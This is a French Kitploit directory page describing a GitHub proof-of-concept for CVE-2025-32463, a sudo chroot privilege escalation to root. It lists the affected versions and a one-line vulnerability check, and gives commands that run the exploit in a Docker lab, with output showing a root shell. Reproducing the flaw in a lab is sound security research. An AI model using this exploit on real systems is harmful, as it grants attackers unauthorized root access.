Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32463_chwoot — Élévation de privilèges à la racine via le binaire sudo avec l'option chroot. CVE-2025-32463 | Kitploit
Outils/GitHubGitHub/pr0v3rbs/cve-2025-32463_chwoot
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingÉvasion de Conteneur
GitHubpr0v3rbs/cve-2025-32463_chwoot

CVE-2025-32463_chwoot

Élévation de privilèges à la racine via le binaire sudo avec l'option chroot. CVE-2025-32463

Voir le dépôt
52595il y a 9 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-32463 – sudo chroot ("chwoot") PoC

Ce dépôt fournit un environnement minimal et reproductible pour démontrer la faille d’élévation de privilèges CVE‑2025‑32463 dans la fonctionnalité chroot de sudo.

  • Cette vulnérabilité a été signalée par Rich Mirch (@0xm1rch sur X) chez Stratascale.
  • Article original : Avis de vulnérabilité : élévation de privilèges du chroot de sudo
  • NVD : CVE-2025-32463 (CVSS 9.3)

Versions concernées

Les versions vulnérables de sudo 1.9.14 jusqu’à 1.9.17 (toutes les révisions p) sont concernées sur la plupart des distributions Linux.

Pages de sécurité

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

Sommaire

FichierDescription
DockerfileConstruit une image Ubuntu 24.04 contenant sudo 1.9.16p2 vulnérable et les outils de compilation
sudo‑chwoot.shExploit de preuve de concept qui ouvre un shell root dans le chroot

Vérification rapide de la vulnérabilité

root@kitploit:~
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

Tester l’exploit dans un conteneur Docker

root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

run.sh transmet --privileged et --rm à Docker afin que le conteneur se nettoie tout seul lorsque vous le quittez.


Nettoyage

Supprimez l’image lorsque vous avez terminé :

root@kitploit:~
docker rmi sudo-chwoot

Référence

  • Note de vulnérabilité Stratascale CRU : Avis de vulnérabilité : élévation de privilèges du chroot de sudo
Télécharger l’outil
run.sh
Script d’assistance qui construit l’image (si nécessaire) et lance le conteneur de l’exploit